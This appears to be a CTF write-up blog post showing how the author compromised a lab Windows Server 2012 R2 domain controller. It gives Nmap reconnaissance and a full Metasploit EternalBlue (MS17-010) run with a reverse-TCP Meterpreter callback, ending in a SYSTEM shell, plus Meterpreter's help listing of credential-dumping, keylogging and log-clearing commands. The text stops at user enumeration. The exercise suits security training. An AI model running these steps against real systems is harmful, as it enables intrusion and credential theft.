Andrew Roderos

Networking and Security

Kaos Corp: Cayenne

by Leave a Comment

In the previous article, we found the ransomware key, and now we are on the hunt for the Windows AD domain controller to decrypt the research data, which also contains the flag. In this article, we will concentrate on the host named Cayenne.

Table Of Contents
  1. Discovery
  2. Port scanning
  3. More scanning
  4. Exploitation
  5. Gaining access
  6. Other attacks
  7. Final thoughts


Discovery

Since we already performed host discovery, we do not need to do it again. However, we need to figure out which ones are Windows-based hosts out of the three left. The quickest way to figure out if a host is running Windows is by pinging, as you can see below.

andrew@kali:~$ ping -c 1 172.20.20.24 | grep ttl; ping -c 1 172.20.20.35 | grep ttl; ping -c 1 172.20.20.37 | grep ttl
64 bytes from 172.20.20.24: icmp_seq=1 ttl=63 time=17.31 ms
64 bytes from 172.20.20.35: icmp_seq=1 ttl=127 time=23.7 ms
64 bytes from 172.20.20.37: icmp_seq=1 ttl=127 time=20.76 ms

Nping

Alternatively, we can use the Nping, an open-source tool for network packet generation, response analysis, and response time measurement. It is part of the Nmap suite and should be in the default installation of Kali Linux.

andrew@kali:~$ sudo nping 172.20.20.22 172.20.20.24 172.20.20.35 172.20.20.37 --icmp -c 1 | grep reply
RCVD (1.0066s) ICMP [172.20.20.24 > 10.10.10.2 Echo reply (type=0/code=0) id=35881 seq=1] IP [ttl=63 id=46377 iplen=28 ]
RCVD (2.0085s) ICMP [172.20.20.35 > 10.10.10.2 Echo reply (type=0/code=0) id=512 seq=1] IP [ttl=127 id=9127 iplen=28 ]
RCVD (3.0112s) ICMP [172.20.20.37 > 10.10.10.2 Echo reply (type=0/code=0) id=29653 seq=1] IP [ttl=127 id=16002 iplen=28 ]

Both commands provided us with similar information. You might be wondering what we are examining here. We are focusing on the TTL (time to live) value. Operating systems have different default TTL values. The majority of Linux-based OS use 64 as the default TTL value. On the other hand, Microsoft has used the TTL value of 128 for more than 20 years.

As you may have noticed, the ping and Nping results showed us a value of 63 and 127. You might be wondering why it is giving us a lower value than the default. When a packet needs to go through a router or firewall, it will subtract one count from the TTL value.

Port scanning

While it is likely that the last two hosts on our list are Windows, we still need to perform a scan to verify. As demonstrated in the first article of the Kaos Corp series, we will use Nmap for the port scan, OS detection, etc.

nmap -A 172.20.20.35 172.20.20.37
andrew@kali:~$ sudo nmap -A 172.20.20.35 172.20.20.37
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 18:55 PST
Nmap scan report for 172.20.20.35
Host is up (0.0059s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Enterprise 7601 Service Pack 1 microsoft-ds (workgroup: SCOVILLE)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1036/tcp open  msrpc        Microsoft Windows RPC
1045/tcp open  msrpc        Microsoft Windows RPC
1060/tcp open  msrpc        Microsoft Windows RPC
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5901/tcp open  vnc          VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|     None (1)
|     Tight (16)
|   Tight auth subtypes: 
|     None
|_  WARNING: Server does not require authentication
8888/tcp open  bindshell    Microsoft Windows 6.1.7601 cmd.exe (**BACKDOOR**)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/2%OT=135%CT=1%CU=40101%PV=Y%DS=2%DC=T%G=Y%TM=61A987
OS:C2%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=7)OP
OS:S(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW
OS:8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)EC
OS:N(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: ANAHEIM; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 9h45m27s, deviation: 4h37m08s, median: 7h05m26s
|_nbstat: NetBIOS name: ANAHEIM, NetBIOS user: , NetBIOS MAC: 26:e3:1a:66:90:93 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: anaheim
|   NetBIOS computer name: ANAHEIM\x00
|   Domain name: scoville.local
|   Forest name: scoville.local
|   FQDN: anaheim.scoville.local
|_  System time: 2021-12-12T02:03:21-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-12T10:03:22
|_  start_date: 2021-09-22T07:29:37
TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   7.82 ms  vyos-r1.networkjutsu.com (10.10.10.1)
2   17.08 ms 172.20.20.35
Nmap scan report for 172.20.20.37
Host is up (0.0055s latency).
Not shown: 973 closed ports
PORT      STATE SERVICE            VERSION
7/tcp     open  echo
9/tcp     open  discard?
13/tcp    open  daytime            Microsoft Windows USA daytime
17/tcp    open  qotd               Windows qotd (English)
19/tcp    open  chargen
53/tcp    open  domain             Simple DNS Plus
80/tcp    open  http               Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec       Microsoft Windows Kerberos (server time: 2021-12-12 10:00:38Z)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
389/tcp   open  ldap               Microsoft Windows Active Directory LDAP (Domain: scoville.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds       Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: SCOVILLE)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http         Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap               Microsoft Windows Active Directory LDAP (Domain: scoville.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: SCOVILLE
|   NetBIOS_Domain_Name: SCOVILLE
|   NetBIOS_Computer_Name: CAYENNE
|   DNS_Domain_Name: scoville.local
|   DNS_Computer_Name: cayenne.scoville.local
|   DNS_Tree_Name: scoville.local
|   Product_Version: 6.3.9600
|_  System_Time: 2021-12-12T10:03:21+00:00
| ssl-cert: Subject: commonName=cayenne.scoville.local
| Not valid before: 2021-09-21T05:35:58
|_Not valid after:  2022-03-23T05:35:58
|_ssl-date: 2021-12-12T10:03:36+00:00; +7h05m27s from scanner time.
6000/tcp  open  ftp                FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 domain
| drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 staging
| drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 staging areas
|_drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 sysvol
|_ftp-bounce: bounce working!
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49157/tcp open  ncacn_http         Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49165/tcp open  msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/2%OT=7%CT=1%CU=40250%PV=Y%DS=2%DC=T%G=Y%TM=61A987C2
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10F%TI=I%II=I%SS=S%TS=7)OPS(O
OS:1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST
OS:11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R
OS:=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: CAYENNE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8h41m26s, deviation: 3h34m39s, median: 7h05m26s
|_nbstat: NetBIOS name: CAYENNE, NetBIOS user: , NetBIOS MAC: 8e:e8:2a:68:89:c5 (unknown)
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: cayenne
|   NetBIOS computer name: CAYENNE\x00
|   Domain name: scoville.local
|   Forest name: scoville.local
|   FQDN: cayenne.scoville.local
|_  System time: 2021-12-12T02:03:21-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-12T10:03:21
|_  start_date: 2021-09-22T07:27:37
TRACEROUTE (using port 554/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 172.20.20.35
2   7.00 ms 172.20.20.37
Post-scan script results:
| clock-skew: 
|   9h45m27s: 
|     172.20.20.35
|_    172.20.20.37
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 186.73 seconds

Our Nmap results confirmed that both hosts are running Windows. Moreover, we now know the domain controller’s Windows version and its IP address.

More scanning

Since the domain controller is running an older version of the Windows Server, we can use Nmap again to run script scans to identify its vulnerability.

SMB (Server Message Block) has had many security vulnerabilities. That said, we should check which SMB versions are enabled. We can easily do that using Nmap script scan, as shown below.

nmap 172.20.20.37 -p 445 –script=smb-protocols
andrew@kali:~$ nmap 172.20.20.37 -p 445 --script=smb-protocols
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-12 20:15 PST
Nmap scan report for 172.20.20.37
Host is up (0.0055s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-protocols: 
|   dialects: 
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|     2.10
|     3.00
|_    3.02
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

Now that we know the SMB version, we can use ExploitDB to hunt for SMB vulnerabilities. In this example, I used the SMB term in my search. Additionally, I ticked the verified check box to limit our results.

Cayenne SMB vulnerability

By skimming through the results, we can see that EternalBlue is there. Many IT professionals have heard of this exploit and will probably recognize the name. However, IT folks who are not in system admin or security roles may not associate it with SMBv1 vulnerability, so it may not be evident.

Now that we have one vulnerability we can test, let’s use Nmap again to verify that we can exploit this.

nmap 172.20.20.37 -p 445 –script smb-vuln-ms17-010
andrew@kali:~$ nmap 172.20.20.37 -p 445 --script smb-vuln-ms17-010
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-13 19:56 PST
Nmap scan report for 172.20.20.37
Host is up (0.0026s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

Our Nmap results confirmed that the Windows domain controller is vulnerable to EternalBlue, also known as MS17-010. Now, let’s see if we can use Metasploit to exploit the vulnerability.

Exploitation

As mentioned in my previous article, I did not know how to use Metasploit at the time of the CTF event. But, I started learning how to use it during the event because of this Cayenne host.

To start using Metasploit, we need to launch it. I typically use the msfconsole -q command to do this. The -q option disables the banner display. Depending on your Kali version, you may need to start the database first by issuing the msfdb start command.

andrew@kali:~$ msfconsole -q
msf6 >

Searching for exploit

Once you see the msf6 prompt, use the search function. Here is an example of me searching for the EternalBlue exploit.

msf6 > search type:exploit ms17-010
msf6 > search type:exploit ms17-010
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/smb/smb_doublepulsar_rce

Alternatively, we can use eternalblue as the keyword. It displays the same results.

msf6> search type:exploit eternalblue
msf6 > search type:exploit eternalblue
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/smb/smb_doublepulsar_rce

A simple way to search is by typing search and keyword, as shown below. As you can see, this command displayed all modules that matched our keyword. Previously, I instructed Metasploit to show only those in the exploit modules.

msf6 > search eternalblue
msf6 > search eternalblue
Matching Modules
================
   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

Using the exploit

The exploit module that most likely would work is the ms17_010_eternalblue from the list, which is the first one. To read something about this exploit module, let's issue the info command, as shown below.

msf6 > info 0
msf6 > info 0
       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
     Module: exploit/windows/smb/ms17_010_eternalblue
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14
Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  Sean Dillon 
  Dylan Davis 
  thelightcosine
  wvu 
  agalway-r7
  cdelafuente-r7
  cdelafuente-r7
  agalway-r7
Available targets:
  Id  Name
  --  ----
  0   Automatic Target
  1   Windows 7
  2   Windows Embedded Standard 7
  3   Windows Server 2008 R2
  4   Windows 8
  5   Windows 8.1
  6   Windows Server 2012
  7   Windows 10 Pro
  8   Windows 10 Enterprise Evaluation
Check supported:
  Yes
Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                            ki/Using-Metasploit
  RPORT          445              yes       The target port (TCP)
  SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Win
                                            dows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
                                            es.
  SMBPass                         no        (Optional) The password for the specified username
  SMBUser                         no        (Optional) The username to authenticate as
  VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows
                                             Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
  VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 20
                                            08 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload information:
  Space: 2000
Description:
  This module is a port of the Equation Group ETERNALBLUE exploit, 
  part of the FuzzBunch toolkit released by Shadow Brokers. There is a 
  buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is 
  calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error 
  where a DWORD is subtracted into a WORD. The kernel pool is groomed 
  so that overflow is well laid-out to overwrite an SMBv1 buffer. 
  Actual RIP hijack is later completed in 
  srvnet!SrvNetWskReceiveComplete. This exploit, like the original may 
  not trigger 100% of the time, and should be run continuously until 
  triggered. It seems like the pool will get hot streaks and need a 
  cool down period before the shells rain in again. The module will 
  attempt to use Anonymous login, by default, to authenticate to 
  perform the exploit. If the user supplies credentials in the 
  SMBUser, SMBPass, and SMBDomain options it will use those instead. 
  On some systems, this module may cause system instability and 
  crashes, such as a BSOD or a reboot. This may be more likely with 
  some payloads.
References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0144
  https://nvd.nist.gov/vuln/detail/CVE-2017-0145
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://nvd.nist.gov/vuln/detail/CVE-2017-0148
  https://github.com/RiskSense-Ops/MS17-010
  
Click to access White-Paper_Eternal-Blue.pdf

  https://www.exploit-db.com/exploits/42030
Also known as:
  ETERNALBLUE

Upon reading the information, it looks like this is the perfect exploit module for this Windows domain controller. Let's go ahead and use it by issuing the command below.

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >

Before we can run the exploit, we need to modify the settings. Exploit modules have different options. However, there are some common ones like RHOST, RPORT, LPORT, and LHOST. Since we do not know the options available for this exploit module, let's find that out using the command as shown below.

msf6 exploit(windows/smb/ms17_010_eternalblue) > options
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/w
                                             iki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Wi
                                             ndows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Window
                                             s Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines
                                             .
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2
                                             008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.8.229    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   0   Automatic Target

Alternatively, we can issue show options to display the same output.

msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://github.com/rapid7/metasploit-framework/w
                                             iki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Wi
                                             ndows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Window
                                             s Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines
                                             .
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2
                                             008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.8.229    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   0   Automatic Target

Before we run the exploit module, we need to make some changes. In this case, at a minimum, we need to change the RHOST and LHOST options for this exploit to run successfully.

The RHOST is our target computer's IP address. In this case, we will set it to 172.20.20.37. The LHOST is our computer's IP address. In this case, our VPN IP address is 10.10.10.2. To change the settings, issue the commands as shown below.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 172.20.20.37
rhost => 172.20.20.37
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.10.2
lhost => 10.10.10.2

We are now ready to run the exploit module. To run the exploit module, we need to issue the command as shown below.

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.10.2:4444 
[*] 172.20.20.37:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.20.20.37:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2012 R2 Standard 9600 x64 (64-bit)
[*] 172.20.20.37:445      - Scanned 1 of 1 hosts (100% complete)
[+] 172.20.20.37:445 - The target is vulnerable.
[*] 172.20.20.37:445 - shellcode size: 1283
[*] 172.20.20.37:445 - numGroomConn: 12
[*] 172.20.20.37:445 - Target OS: Windows Server 2012 R2 Standard 9600
[+] 172.20.20.37:445 - got good NT Trans response
[+] 172.20.20.37:445 - got good NT Trans response
[+] 172.20.20.37:445 - SMB1 session setup allocate nonpaged pool success
[+] 172.20.20.37:445 - SMB1 session setup allocate nonpaged pool success
[+] 172.20.20.37:445 - good response status for nx: INVALID_PARAMETER
[+] 172.20.20.37:445 - good response status for nx: INVALID_PARAMETER
[*] Sending stage (200262 bytes) to 172.20.20.37
[*] Meterpreter session 1 opened (10.10.10.2:4444 -> 172.20.20.37:51316 ) at 2021-12-13 23:21:10 -0800
meterpreter >

Meterpreter shell

Since we see the meterpreter prompt, that means the module successfully exploited the EternalBlue vulnerability.

Note

You may need to issue run a few times to get the Meterpreter shell.

There are many commands that you can issue in the Meterpreter shell. If you are unfamiliar with it, you can enter the question mark key and hit the Enter key to view the help menu.

meterpreter > ?
meterpreter > ?
Core Commands
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    pivot                     Manage pivot listeners
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    ssl_verify                Modify the SSL certificate verification setting
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands
============================
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================
    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table

Stdapi: System Commands
=======================
    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyboard_send  Send keystrokes
    keyevent       Send key events
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    mouse          Send mouse events
    screenshare    Watch the remote user desktop in real time
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================
    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands
=============================
    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

Priv: Elevate Commands
======================
    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================
    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands
========================
    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

Since this was a CTF, time is of the essence. Hence, I decided to find a way to get to the command shell as soon as possible. That said, I issued the shell command right away to explore.

meterpreter > shell
meterpreter > shell
Process 4300 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

Typically, the first command I run after getting a shell using Meterpreter is the whoami command.

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system

In this case, we have a system account, which means we have the highest privilege level. Since I needed a way to access the desktop environment, this is a perfect access level.

User enumeration

During the CTF, my first instinct was to get a user account that had administrator-level access. That said, I decided to enumerate the users. There are two ways that I know of to get a list of user accounts in this scenario.

Meterpreter shell

As previously mentioned, I did not know how to use Metasploit back then, so I did not use this method during the event. But, after taking the Penetration Testing Student and passing the eJPT exam, I know more now to share this with you.

